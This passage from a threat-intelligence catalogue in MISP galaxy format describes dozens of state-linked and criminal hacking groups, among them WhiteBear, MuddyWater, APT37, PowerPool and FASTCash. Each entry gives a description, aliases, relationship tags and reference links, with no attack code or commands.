compromised websites and hijacked satellite connections for command and control (C2) infrastructure. As a matter of fact, WhiteBear infrastructure has overlap with other Turla campaigns, like those deploying Kopiluwak, as documented in “KopiLuwak – A New JavaScript Payload from Turla” in December 2016. WhiteBear infected systems maintained a dropper (which was typically signed) as well as a complex malicious platform which was always preceded by WhiteAtlas module deployment attempts. However, despite the similarities to previous Turla campaigns, we believe that WhiteBear is a distinct project with a separate focus. We note that this observation of delineated target focus, tooling, and project context is an interesting one that also can be repeated across broadly labeled Turla and Sofacy activity. From February to September 2016, WhiteBear activity was narrowly focused on embassies and consular operations around the world. All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations. Continued WhiteBear activity later shifted to include defense-related organizations into June 2017. When compared to WhiteAtlas infections, WhiteBear deployments are relatively rare and represent a departure from the broader Skipper Turla target set. Additionally, a comparison of the WhiteAtlas framework to WhiteBear components indicates that the malware is the product of separate development efforts. WhiteBear infections appear to be preceded by a condensed spearphishing dropper, lack Firefox extension installer payloads, and contain several new components signed with a new code signing digital certificate, unlike WhiteAtlas incidents and modules.

The tag is: misp-galaxy:threat-actor="White Bear"

White Bear is also known as:

- Skipper Turla

Table 6044. Table References

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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://securelist.com/introducing-whitebear/81638/">https://securelist.com/introducing-whitebear/81638/</a></td>
</tr>
<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/whitebear">https://www.cfr.org/interactive/cyber-operations/whitebear</a></td>
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</table>

Pale Panda

The tag is: misp-galaxy:threat-actor="Pale Panda"

Table 6045. Table References

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<tbody>
<tr>
<td><a href="http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf">http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf</a></td>
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</table>

Mana Team

The tag is: misp-galaxy:threat-actor="Mana Team"

Table 6046. Table References

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Sowbug

Sowbug has been conducting highly targeted cyber attacks against organizations in South America and Southeast Asia and appears to be heavily focused on foreign policy institutions and diplomatic targets. Sowbug has been seen mounting classic espionage attacks by stealing documents from the organizations it infiltrates.

The tag is: misp-galaxy:threat-actor="Sowbug"

Sowbug has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="Sowbug - G0054" with estimative-language:likelihood-probability="likely"

Table 6047. Table References

Links

https://www.cfr.org/interactive/cyber-operations/sowbug
https://attack.mitre.org/groups/G0054/

MuddyWater

The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.

The tag is: misp-galaxy:threat-actor="MuddyWater"

MuddyWater is also known as:

- TEMP.Zagros
- Static Kitten
- Seedworm
- MERCURY
- COBALT ULSTER

MuddyWater has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="MuddyWater - G0069" with estimative-
MoneyTaker

In less than two years, this group has conducted over 20 successful attacks on financial institutions and legal firms in the USA, UK and Russia. The group has primarily been targeting card processing systems, including the AWS CBR (Russian Interbank System) and purportedly SWIFT (US). Given the wide usage of STAR in LATAM, financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group.

The tag is: `misp-galaxy:threat-actor="MoneyTaker"`
Microcin

We’re already used to the fact that complex cyberattacks use 0-day vulnerabilities, bypassing digital signature checks, virtual file systems, non-standard encryption algorithms and other tricks. Sometimes, however, all of this may be done in much simpler ways, as was the case in the malicious campaign that we detected a while ago – we named it ‘Microcin’ after microini, one of the malicious components used in it.

The tag is: misp-galaxy:threat-actor="Microcin"

Microcin is also known as:

• SixLittleMonkeys

Table 6050. Table References

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<tbody>
<tr>
<td><a href="https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/">https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/</a></td>
</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/">https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/</a></td>
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</table>

Dark Caracal

Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal, a persistent and prolific actor, who at the time of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At present, we have knowledge of hundreds of gigabytes of exfiltrated data, in 21+ countries, across thousands of victims. Stolen data includes enterprise intellectual property and personally identifiable information.

The tag is: misp-galaxy:threat-actor="Dark Caracal"

Table 6051. Table References

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<tbody>
<tr>
<td><a href="https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf">https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf</a></td>
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<tr>
<td><a href="https://attack.mitre.org/groups/G0070/">https://attack.mitre.org/groups/G0070/</a></td>
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Nexus Zeta

Nexus Zeta is no stranger when it comes to implementing SOAP related exploits. The threat actor has already been observed in implementing two other known SOAP related exploits, CVE-
2014–8361 and CVE-2017–17215 in his Satori botnet project. A third SOAP exploit, TR-069 bug has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP related exploit which is discovered in the wild by IoT botnets.

The tag is: misp-galaxy:threat-actor="Nexus Zeta"

Table 6052. Table References

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**APT37**

APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea. In 2017, APT37 expanded its targeting beyond the Korean peninsula to include Japan, Vietnam and the Middle East, and to a wider range of industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities.

The tag is: misp-galaxy:threat-actor="APT37"

APT37 is also known as:

- APT 37
- Group 123
- Group123
- ScarCruft
- Reaper
- Reaper Group
- Red Eyes
- Ricochet Chollima
- Operation Daybreak
- Operation Erebus
- Venus 121

APT37 has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="APT37 - G0067" with estimative-language:likelihood-probability="likely"
- linked-to: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

Table 6053. Table References

| Links |
Leviathan

Leviathan is an espionage actor targeting organizations and high-value targets in defense and government. Active since at least 2014, this actor has long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe.

The tag is: *misp-galaxy:threat-actor*="Leviathan"

Leviathan is also known as:

- TEMP.Periscope
- TEMP.Jumper
- APT 40
- APT40
- BRONZE MOHAWK
- GADOLINIUM
- Kryptonite Panda

Leviathan has relationships with:

- similar: *misp-galaxy:mitre-intrusion-set*="Leviathan - G0065" with estimative-language:likelihood-probability="likely"

*Table 6054. Table References*

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APT35

FireEye has identified APT35 operations dating back to 2014. APT35, also known as the Newscaster Team, is a threat group sponsored by the Iranian government that conducts long term, resource-intensive operations to collect strategic intelligence. APT35 typically targets U.S. and the Middle Eastern military, diplomatic and government personnel, organizations in the media, energy and defense industrial base (DIB), and engineering, business services and telecommunications sectors.

The tag is: misp-galaxy:threat-actor="APT35"

APT35 is also known as:

- APT 35
- Newscaster Team

Table 6055. Table References

Links


Orangeworm

Symantec has identified a previously unknown group called Orangeworm that has been observed installing a custom backdoor called Trojan.Kwampirs within large international corporations that operate within the healthcare sector in the United States, Europe, and Asia. First identified in January 2015, Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims. Known victims include healthcare providers, pharmaceuticals, IT solution providers for healthcare and equipment manufacturers that serve the healthcare industry, likely for the purpose of corporate espionage.

The tag is: misp-galaxy:threat-actor="Orangeworm"

Table 6056. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia
https://attack.mitre.org/groups/G0071/
ALLANITE

Adversaries abusing ICS (based on Dragos Inc adversary list). ALLANITE accesses business and industrial control (ICS) networks, conducts reconnaissance, and gathers intelligence in United States and United Kingdom electric utility sectors. Dragos assesses with moderate confidence that ALLANITE operators continue to maintain ICS network access to: (1) understand the operational environment necessary to develop disruptive capabilities, (2) have ready access from which to disrupt electric utilities. ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks, including collecting and distributing screenshots of industrial control systems. ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities. ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system.

The tag is: `misp-galaxy:threat-actor="ALLANITE"`

ALLANITE is also known as:

- Palmetto Fusion
- Allanite

*Table 6057. Table References*

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<tr>
<td><a href="https://dragos.com/adversaries.html">https://dragos.com/adversaries.html</a></td>
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<td><a href="https://dragos.com/blog/20180510Allanite.html">https://dragos.com/blog/20180510Allanite.html</a></td>
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</table>

CHRYSENE

Adversaries abusing ICS (based on Dragos Inc adversary list). This threat actor targets organizations involved in oil, gas, and electricity production, primarily in the Gulf region, for espionage purposes. According to one cybersecurity company, the threat actor “compromises a target machine and passes it off to another threat actor for further exploitation.”

The tag is: `misp-galaxy:threat-actor="CHRYSENE"`

CHRYSENE is also known as:

- OilRig
- Greenbug

CHRYSENE has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Cleaver - G0003"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Cutting Kitten"` with `estimative-language:likelihood-probability="likely"`
• similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:mitre-intrusion-set="OilRig - G0049" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="Greenbug" with estimative-language:likelihood-probability="likely"

Table 6058. Table References

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<td><a href="https://dragos.com/adversaries.html">https://dragos.com/adversaries.html</a></td>
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<td><a href="https://www.cfr.org/interactive/cyber-operations/chrysene">https://www.cfr.org/interactive/cyber-operations/chrysene</a></td>
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</table>

**DYMALLOY**

Adversaries abusing ICS (based on Dragos Inc adversary list). This threat actor targets industrial control systems in Turkey, Europe, and North America. Believed to be linked to Crouching Yeti

The tag is: *misp-galaxy:threat-actor="DYMALLOY"*

DYMALLOY is also known as:
- Dragonfly 2.0
- Dragonfly2
- Berserker Bear

Table 6059. Table References

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<td><a href="https://dragos.com/adversaries.html">https://dragos.com/adversaries.html</a></td>
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</table>
**MAGNALLIUM**

Adversaries abusing ICS (based on Dragos Inc adversary list).

The tag is: `misp-galaxy:threat-actor="MAGNALLIUM"`

MAGNALLIUM is also known as:

- APT33

MAGNALLIUM has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="APT33 - G0064"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="APT33"` with `estimative-language:likelihood-probability="likely"

Table 6060. Table References

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<td><a href="https://www.cfr.org/interactive/cyber-operations/apt-33">https://www.cfr.org/interactive/cyber-operations/apt-33</a></td>
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</table>

**XENOTIME**

Adversaries abusing ICS (based on Dragos Inc adversary list).

The tag is: `misp-galaxy:threat-actor="XENOTIME"`

XENOTIME is also known as:

Table 6061. Table References

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<tbody>
<tr>
<td><a href="https://dragos.com/adversaries.html">https://dragos.com/adversaries.html</a></td>
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</table>

**ZooPark**

ZooPark is a cyberespionage operation that has been focusing on Middle Eastern targets since at least June 2015. The threat actors behind ZooPark infect Android devices using several generations of malware we label from v1-v4, with v4 being the most recent version deployed in 2017.

The tag is: `misp-galaxy:threat-actor="ZooPark"`

Table 6062. Table References
RANCOR

The Rancor group’s attacks use two primary malware families which are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers' toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to Singapore and Cambodia.

The tag is: **misp-galaxy:threat-actor="RANCOR"**

RANCOR is also known as:

- Rancor group
- Rancor
- Rancor Group

Table 6063. Table References

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<thead>
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<tbody>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/">https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/</a></td>
</tr>
<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/rancor">https://www.cfr.org/interactive/cyber-operations/rancor</a></td>
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<tr>
<td><a href="https://attack.mitre.org/groups/G0075/">https://attack.mitre.org/groups/G0075/</a></td>
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The Big Bang

While it is not clear exactly what the attacker is looking for, what is clear is that once he finds it, a second stage of the attack awaits, fetching additional modules and/or malware from the Command and Control server. This then is a surveillance attack in progress and has been dubbed ‘Big Bang’ due to the attacker’s fondness for the ‘Big Bang Theory’ TV show, after which some of the malware’s modules are named.

The tag is: **misp-galaxy:threat-actor="The Big Bang"**

Table 6064. Table References

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<thead>
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<tbody>
<tr>
<td><a href="https://research.checkpoint.com/apt-attack-middle-east-big-bang/">https://research.checkpoint.com/apt-attack-middle-east-big-bang/</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2017/06/palestine-delphi.html">https://blog.talosintelligence.com/2017/06/palestine-delphi.html</a></td>
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</table>

Subaat

In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at a government organization. While tracking the activities of this campaign, we identified a repository...
of additional malware, including a web server that was used to host the payloads used for both this attack as well as others.

The tag is: `misp-galaxy:threat-actor="Subaat"

Table 6065. Table References

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The Gorgon Group

Unit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec, in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are calling Gorgon Group.

The tag is: `misp-galaxy:threat-actor="The Gorgon Group"

The Gorgon Group is also known as:

- Gorgon Group
- Subaat

Table 6066. Table References

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<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/">https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/">https://unit42.paloaltonetworks.com/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/">https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/</a></td>
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<tr>
<td><a href="https://attack.mitre.org/groups/G0078/">https://attack.mitre.org/groups/G0078/</a></td>
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DarkHydrus

In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy).
The tag is: *misp-galaxy:threat-actor="DarkHydrus"

DarkHydrus is also known as:

- LazyMeerkat

RedAlpha

Recorded Future’s Insikt Group has identified two new cyberespionage campaigns targeting the Tibetan Community over the past two years. The campaigns, which we are collectively naming RedAlpha, combine light reconnaissance, selective targeting, and diverse malicious tooling. We discovered this activity as the result of pivoting off of a new malware sample observed targeting the Tibetan community based in India.

The tag is: *misp-galaxy:threat-actor="RedAlpha"

APT-C-35

In March 2017, the 360 Chasing Team found a sample of targeted attacks that confirmed the previously unknown sample of APT’s attack actions, which the organization can now trace back at least in April 2016. The chasing team named the attack organization APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered the organization’s new attack activity, confirmed and exposed the gang’s targeted attacks against Pakistan, and analyzed in detail. The unique EHDevel malicious code framework used by the organization

The tag is: *misp-galaxy:threat-actor="APT-C-35"
APT-C-35 is also known as:

- DoNot Team
- Donot Team
- APT-C-35

Table 6069. Table References

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<tr>
<td><a href="https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/">https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/</a></td>
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<td><a href="https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china-en/">https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china-en/</a></td>
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TempTick

This threat actor targets organizations in the finance, defense, aerospace, technology, health-care, and automotive sectors and media organizations in East Asia for the purpose of espionage. Believed to be responsible for the targeting of South Korean actors prior to the meeting of Donald J. Trump and Kim Jong-un

The tag is: misp-galaxy:threat-actor="TempTick"

Table 6070. Table References

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<td><a href="https://www.cfr.org/interactive/cyber-operations/temptick">https://www.cfr.org/interactive/cyber-operations/temptick</a></td>
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Operation Parliament

This threat actor uses spear-phishing techniques to target parliaments, government ministries, academics, and media organizations, primarily in the Middle East, for the purpose of espionage. Based on our findings, we believe the attackers represent a previously unknown geopolitically motivated threat actor. The campaign started in 2017, with the attackers doing just enough to achieve their goals. They most likely have access to additional tools when needed and appear to have access to an elaborate database of contacts in sensitive organizations and personnel worldwide, especially of vulnerable and non-trained staff. The victim systems range from personal desktop or laptop systems to large servers with domain controller roles or similar. The nature of the targeted ministries varied, including those responsible for telecommunications, health, energy, justice, finance and so on. Operation Parliament appears to be another symptom of escalating tensions in the Middle East region. The attackers have taken great care to stay under the radar, imitating another attack group in the region. They have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their command and control servers. The targeting seems to have slowed down since the beginning of 2018, probably winding down when the desired data or access was obtained. The targeting of specific victims is unlike previously seen behavior in regional campaigns by Gaza Cybergang or Desert Falcons and points to an elaborate
information-gathering exercise that was carried out before the attacks (physical and/or digital). With deception and false flags increasingly being employed by threat actors, attribution is a hard and complicated task that requires solid evidence, especially in complex regions such as the Middle East.

The tag is: misp-galaxy:threat-actor="Operation Parliament"

### Table 6071. Table References

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<td><a href="https://www.cfr.org/interactive/cyber-operations/operation-parliament">https://www.cfr.org/interactive/cyber-operations/operation-parliament</a></td>
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<tr>
<td><a href="https://securelist.com/operation-parliament-who-is-doing-what/85237/">https://securelist.com/operation-parliament-who-is-doing-what/85237/</a></td>
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### Inception Framework

This threat actor uses spear-phishing techniques to target private-sector energy, defense, aerospace, research, and media organizations and embassies in Africa, Europe, and the Middle East, for the purpose of espionage.

The tag is: misp-galaxy:threat-actor="Inception Framework"

### Table 6072. Table References

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<td><a href="https://logrhythm.com/blog/catching-the-inception-framework-phishing-attack/">https://logrhythm.com/blog/catching-the-inception-framework-phishing-attack/</a></td>
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<tr>
<td><a href="https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/">https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/</a></td>
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### Winnti Umbrella

This threat actor targets software companies and political organizations in the United States, China, Japan, and South Korea. It primarily acts to support cyber operations conducted by other threat
actors affiliated with Chinese intelligence services. Believed to be associated with the Axiom, APT 17, and Mirage threat actors. Believed to share the same tools and infrastructure as the threat actors that carried out Operation Aurora, the 2015 targeting of video game companies, the 2015 targeting of the Thai government, and the 2017 targeting of Chinese-language news websites.

The tag is: misp-galaxy:threat-actor="Winnti Umbrella"

Table 6073. Table References

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<td><a href="https://www.cfr.org/interactive/cyber-operations/winnti-umbrella">https://www.cfr.org/interactive/cyber-operations/winnti-umbrella</a></td>
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**HenBox**

This threat actor targets Uighurs—a minority ethnic group located primarily in northwestern China—and devices from Chinese mobile phone manufacturer Xiaomi, for espionage purposes.

The tag is: misp-galaxy:threat-actor="HenBox"

Table 6074. Table References

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<td><a href="https://www.cfr.org/interactive/cyber-operations/henbox">https://www.cfr.org/interactive/cyber-operations/henbox</a></td>
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**Mustang Panda**

This threat actor targets nongovernmental organizations using Mongolian-themed lures for espionage purposes. In April 2017, CrowdStrike Falcon Intelligence observed a previously unattributed actor group with a Chinese nexus targeting a U.S.-based think tank. Further analysis revealed a wider campaign with unique tactics, techniques, and procedures (TTPs). This adversary targets non-governmental organizations (NGOs) in general, but uses Mongolian language decoys and themes, suggesting this actor has a specific focus on gathering intelligence on Mongolia. These campaigns involve the use of shared malware like Poison Ivy or PlugX. Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files.

The tag is: misp-galaxy:threat-actor="Mustang Panda"

Mustang Panda is also known as:

- BRONZE PRESIDENT
- HoneyMyte
- Red Lich

Table 6075. Table References

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Thrip

This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.

The tag is: `misp-galaxy:threat-actor="Thrip"`

Thrip is also known as:

- LOTUS PANDA

Stealth Mango and Tangelo

This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.

The tag is: `misp-galaxy:threat-actor="Stealth Mango and Tangelo"`

PowerPool

Malware developers have started to use the zero-day exploit for Task Scheduler component in Windows, two days after proof-of-concept code for the vulnerability appeared online.

A security researcher who uses the online name SandboxEscaper on August 27 released the source code for exploiting a security bug in the Advanced Local Procedure Call (ALPC) interface used by
Windows Task Scheduler.

More specifically, the problem is with the SchRpcSetSecurity API function, which fails to properly check user’s permissions, allowing write privileges on files in C:\Windows\Task.

The vulnerability affects Windows versions 7 through 10 and can be used by an attacker to escalate their privileges to all-access SYSTEM account level.

A couple of days after the exploit code became available (source and binary), malware researchers at ESET noticed its use in active malicious campaigns from a threat actor they call PowerPool, because of their tendency to use tools mostly written in PowerShell for lateral movement.

The group appears to have a small number of victims in the following countries: Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States, and Ukraine.

The researchers say that PowerPool developers did not use the binary version of the exploit, deciding instead to make some subtle changes to the source code before recompiling it.

The tag is: misp-galaxy:threat-actor="PowerPool"

PowerPool is also known as:

- IAmTheKing

**Bahamut**

Bahamut is a threat actor primarily operating in Middle East and Central Asia, suspected to be a private contractor to several state sponsored actors. They were observed conduct phishing as well as desktop and mobile malware campaigns.

The tag is: misp-galaxy:threat-actor="Bahamut"
**Iron Group**

Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.

The tag is: `misp-galaxy:threat-actor="Iron Group"`

Iron Group is also known as:

- Iron Cyber Group

*Table 6080. Table References*

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<tr>
<td><a href="https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/">https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/</a></td>
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</table>

**Operation BugDrop**

This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations.

The tag is: `misp-galaxy:threat-actor="Operation BugDrop"`

*Table 6081. Table References*

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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/operation-bugdrop">https://www.cfr.org/interactive/cyber-operations/operation-bugdrop</a></td>
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</table>

**Red October**

This threat actor targets governments, diplomatic missions, academics, and energy and aerospace organizations for the purpose of espionage. Also known as the Rocra and believed to be the same threat actor as Cloud Atlas

The tag is: `misp-galaxy:threat-actor="Red October"`

Red October is also known as:

- the Rocra

*Table 6082. Table References*

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<td><a href="https://www.cfr.org/interactive/cyber-operations/red-october">https://www.cfr.org/interactive/cyber-operations/red-october</a></td>
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</table>
Cloud Atlas

This threat actor targets governments and diplomatic organizations for espionage purposes.

The tag is: misp-galaxy:threat-actor="Cloud Atlas"

Unnamed Actor

This threat actor compromises civil society groups the Chinese Communist Party views as hostile to its interests, such as Tibetan, Uyghur, Hong Kong, and Taiwanese activist. The threat actor also targeted the Myanmar electoral commission.

The tag is: misp-galaxy:threat-actor="Unnamed Actor"

COBALT DICKENS

"A threat group associated with the Iranian government. The threat group created lookalike domains to phish targets and used credentials to steal intellectual property from specific resources, including library systems."

The tag is: misp-galaxy:threat-actor="COBALT DICKENS"

COBALT DICKENS is also known as:

• Cobalt Dickens

MageCart

Digital threat management company RiskIQ tracks the activity of MageCart group and reported their use of web-based card skimmers since 2016.
Domestic Kitten

An extensive surveillance operation targets specific groups of individuals with malicious mobile apps that collect sensitive information on the device along with surrounding voice recordings. Researchers with CheckPoint discovered the attack and named it Domestic Kitten. The targets are Kurdish and Turkish natives, and ISIS supporters, all Iranian citizens.

The tag is: misp-galaxy:threat-actor="Domestic Kitten"

FASTCash

Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.

The tag is: misp-galaxy:threat-actor="FASTCash"

Roaming Mantis

According to new research by Kaspersky’s GReAT team, the online criminal activities of the Roaming Mantis Group have continued to evolve since they were first discovered in April 2018. As
part of their activities, this group hacks into exploitable routers and changes their DNS configuration. This allows the attackers to redirect the router user’s traffic to malicious Android apps disguised as Facebook and Chrome or to Apple phishing pages that were used to steal Apple ID credentials. Recently, Kaspersky has discovered that this group is testing a new monetization scheme by redirecting iOS users to pages that contain the Coinhive in-browser mining script rather than the normal Apple phishing page. When users are redirected to these pages, they will be shown a blank page in the browser, but their CPU utilization will jump to 90% or higher.

The tag is: *misp-galaxy:threat-actor="Roaming Mantis"*

Roaming Mantis is also known as:

- Roaming Mantis Group

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**GreyEnergy**

ESET research reveals a successor to the infamous BlackEnergy APT group targeting critical infrastructure, quite possibly in preparation for damaging attacks.

The tag is: *misp-galaxy:threat-actor="GreyEnergy"*

GreyEnergy has relationships with:

- similar: *misp-galaxy:threat-actor="Sandworm"* with *estimative-language:likelihood-probability="likely"*

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**The Shadow Brokers**

The Shadow Brokers (TSB) is a hacker group who first appeared in the summer of 2016. They published several leaks containing hacking tools from the National Security Agency (NSA, including several zero-day exploits.[1] Specifically, these exploits and vulnerabilities targeted enterprise firewalls, antivirus software, and Microsoft products. The Shadow Brokers originally attributed the leaks to the Equation Group threat actor, who have been tied to the NSA’s Tailored Access Operations unit.

The tag is: *misp-galaxy:threat-actor="The Shadow Brokers"*
The Shadow Brokers is also known as:

- The ShadowBrokers
- TSB
- Shadow Brokers
- ShadowBrokers

Table 6090. Table References

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| https://securelist.com/darkpulsar/88199/ |
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| https://www.scmagazineuk.com/second-shadow-brokers-dump-released/article/1476023 |
| http://securityaffairs.co/wordpress/62770/hacking/shadowbrokers-return.html |
| https://blacklakesecurity.com/who-was-the-nsa-contractor-arrested-for-leaking-the-shadow-brokers-hacking-tools/ |

**EvilTraffic**

Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.

The tag is: *misp-galaxy:threat-actor="EvilTraffic"*

EvilTraffic is also known as:

- Operation EvilTraffic

Table 6091. Table References

Links

| http://securityaffairs.co/wordpress/68059/cyber-crime/eviltraffic-malvertising-campaign.html |
**HookAds**

HookAds is a malvertising campaign that purchases cheap ad space on low quality ad networks commonly used by adult web sites, online games, or blackhat seo sites. These ads will include JavaScript that redirects a visitor through a serious of decoy sites that look like pages filled with native advertisements, online games, or other low quality pages. Under the right circumstances, a visitor will silently load the Fallout exploit kit, which will try and install its malware payload.

The tag is: `misp-galaxy:threat-actor="HookAds"`

**INDRIK SPIDER**

INDRIK SPIDER is a sophisticated eCrime group that has been operating Dridex since June 2014. In 2015 and 2016, Dridex was one of the most prolific eCrime banking trojans on the market and, since 2014, those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits. Throughout its years of operation, Dridex has received multiple updates with new modules developed and new anti-analysis features added to the malware. In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.

The tag is: `misp-galaxy:threat-actor="INDRIK SPIDER"`

**DNSpionage**

Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it's clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuous as possible during their attacks. Based on this actor's infrastructure and TTPs, we haven't been able to connect them with any other campaign or actor that's been observed recently. This particular campaign utilizes two fake, malicious websites...
